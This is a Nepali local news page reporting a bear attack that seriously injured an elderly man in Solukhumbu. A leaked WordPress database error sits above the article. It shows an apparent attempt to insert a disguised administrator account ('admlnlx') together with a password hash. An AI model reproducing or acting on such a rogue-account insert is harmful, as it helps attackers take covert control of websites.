WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/xt0vRUBdtnfHW5LNooPbarkiuOFw1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 10:05:41', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बुमा भालुको आक्रमणबाट एक बृद्ध गम्भिर घाइते भएको छ । सोलुदुधकुण्ड नगरपालिका १ टाक्सिन्दुको हेवामा मङ्गलबार दिउँसो भालुको आक्रमणबाट पासाङ शेर्पा घाइते भएको वडा सदस्य उत्रमन राईले जानकारी दिए ।
७६ वर्षिय शेर्पालाई गाई चराउँदै गरेको अवस्थामा सितिलिङ भन्ने ठाउँमा अचानक भालुले आक्रमण गरेपछि बृद्धको अनुहारमा गम्भिर चोट लागेको हो । घाइते शेर्पाको जिल्ला अस्पताल फाप्लुमा उपचार भईरहेको र शेर्पाको अवस्था चिन्ताजनक रहेको सदस्य राईले बताए ।
घाइते शेर्पाको टाउको, पेट, खुट्टामा गम्भिर चोट लागेको प्रहरीले जनाएको छ । मकै पाक्ने सिजनमा वर्षेनि भालुको आक्रमणबाट धेरै कृषकहरुको मृत्यू तथा घाइते हुने गरेका छन् ।
यसअघि तामाखानीमा स्थानीयले पासोमा पारेर एउटा भालुलाई समातेर जिल्ला वन कार्यालयलाई बुझाएका थिए ।
sourse:himshikharnews